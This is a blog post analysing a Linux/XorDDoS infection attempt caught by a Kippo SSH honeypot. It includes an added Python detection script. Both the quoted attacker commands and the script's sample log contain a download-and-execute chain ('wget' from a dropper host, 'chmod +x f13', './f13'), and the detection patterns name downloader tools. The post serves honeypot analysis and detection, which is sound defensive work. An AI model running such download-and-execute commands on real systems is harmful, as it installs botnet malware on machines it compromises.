Kippo Honeypot Attack – Linux XorDDOS malware


So I have had my kippo honeypot running for a while and got some pretty good statistics from it. But after a while I got bored and turned it all off.
I decided to fire it back up again and got some interesting hits from
It seems to be trying to execute some Linux/XorDDOS malware according to the guys over at

“…. the post-infection of this malware made the infected machine to act as bot, remotely controlled for malicious process, config, deny IP, daemon and configurations. They are using XOR’ed encryption communication, processes are sent with md5 encoded beforehand. The main function of this malware ELF is for a stealth DDoS attacker botnet.”

As you can see from my SIEM this IP is on the OTX register and it's known as malicious.
Basic info of this IP is:-

Location: Guangzhou, China (CN)

ASN/OWNER: AS58543 Guangdong

FIRST SEEN: Jan. 4, 2016, 8:31 am

LAST SEEN: Jan. 6, 2016, 7:26 am

SSH Kippo Honeypot

So we can see on the SIEM it's detected the hits coming in. I've allowed the connection to pass the firewall as it's going into my DMZ on a specific port.

It connects with the default honeypot admin/123456 login and tries the following commands:

“#! /bin/sh
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
wget hXXp:// (I’ve edited it to say hXXp so there isn’t a live link)
chmod +x f13”

By doing this it's trying to download a file from the host in the wget line. That IP belongs to a GoDaddy host, IOFLOD(dot)com,

and the chmod +x gives the file execute permission so that it can then be run with ./f13.

One thing to note is that none of this is detected in Kippo-Graph, it only registers the connection from the IP.
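Because Kippo-Graph only shows the connecting IP and not the command chain, it is worth pulling the CMD lines out of the raw Kippo log yourself and flagging the download / chmod +x / execute pattern described above. The script below is an added example, not code from the original post or from the Kippo project: the log lines are constructed (the `HoneyPotTransport,<session>,<ip>] CMD:` layout is assumed from Kippo's logging, and the 203.0.113.10 / 198.51.100.7 addresses and the dropper URL are placeholders, not the real indicators from the post).

```python
import re
from collections import defaultdict
from urllib.parse import urlparse

# Constructed Kippo-style log excerpt (assumed format, placeholder IPs/URL).
# Session 1 replays the download -> chmod +x -> ./f13 chain from the post,
# session 2 the later "ls -la /var/run/" visit, session 3 is unrelated noise.
SAMPLE_LOG = """\
2016-01-04 08:31:02+0000 [HoneyPotTransport,1,203.0.113.10] login attempt [admin/123456] succeeded
2016-01-04 08:31:03+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,203.0.113.10] CMD: #! /bin/sh
2016-01-04 08:31:03+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,203.0.113.10] CMD: PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
2016-01-04 08:31:03+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,203.0.113.10] CMD: wget http://dropper.example/f13
2016-01-04 08:31:04+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,203.0.113.10] CMD: chmod +x f13
2016-01-04 08:31:04+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,203.0.113.10] CMD: ./f13
2016-01-06 07:26:10+0000 [HoneyPotTransport,2,203.0.113.10] login attempt [admin/123456] succeeded
2016-01-06 07:26:11+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,2,203.0.113.10] CMD: ls -la /var/run/
2016-01-05 12:00:00+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,3,198.51.100.7] CMD: uname -a
"""

# One CMD line: timestamp, session id and source IP from the transport tag, then the command.
LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+) \[.*?HoneyPotTransport,(?P<sid>\d+),(?P<ip>[0-9.]+)\] CMD: (?P<cmd>.*)$"
)
DOWNLOADER_RE = re.compile(r"\b(?:wget|curl|tftp)\b")
URL_RE = re.compile(r"(?:https?|ftp|hxxps?)://\S+", re.IGNORECASE)
CHMOD_RE = re.compile(r"\bchmod\s+\+x\s+(\S+)")
EXEC_RE = re.compile(r"(?:^|[;&|]\s*)\./(\S+)")   # "./name" at the start of a command


def parse_commands(log_text):
    """Group the CMD lines of a Kippo-style log by (source IP, session id)."""
    sessions = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            sessions[(m["ip"], m["sid"])].append((m["ts"], m["cmd"].strip()))
    return sessions


def find_download_exec_chains(log_text):
    """Return one finding per session that fetches a file, marks it executable and runs it.

    All three stages must refer to the same file name; a session that only
    downloads, or only lists directories, is not reported.
    """
    findings = []
    for (ip, sid), cmds in parse_commands(log_text).items():
        stages = {}  # stage name -> file name seen at that stage
        for _ts, cmd in cmds:
            if DOWNLOADER_RE.search(cmd):
                u = URL_RE.search(cmd)
                if u:
                    # Last path segment of the URL is the file wget will write.
                    stages["download"] = urlparse(u.group(0)).path.rsplit("/", 1)[-1]
            c = CHMOD_RE.search(cmd)
            if c:
                stages["chmod"] = c.group(1).lstrip("./")
            e = EXEC_RE.search(cmd)
            if e:
                stages["exec"] = e.group(1)
        names = set(stages.values())
        if {"download", "chmod", "exec"} <= stages.keys() and len(names) == 1:
            findings.append({
                "ip": ip,
                "session": sid,
                "file": names.pop(),
                "first_seen": cmds[0][0],
                "commands": [c for _, c in cmds],
            })
    return findings


if __name__ == "__main__":
    for f in find_download_exec_chains(SAMPLE_LOG):
        print(f"{f['ip']} session {f['session']}: download-and-execute of "
              f"{f['file']} starting {f['first_seen']}")
        for c in f["commands"]:
            print("   ", c)
```

Run against the real kippo.log the same way and each flagged session gives you the IP, the dropper URL and the file name to hand to VirusTotal or your SIEM, which is exactly the detail Kippo-Graph's connection view leaves out.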


The next thing you can see is the below screenshot.

We then get a connection back again and the following commands are executed:-
“ls -la /var/run/”


This sounds very much like the malware that has been torn apart by MalwareMustDie.

The files are also picked up by VirusTotal.
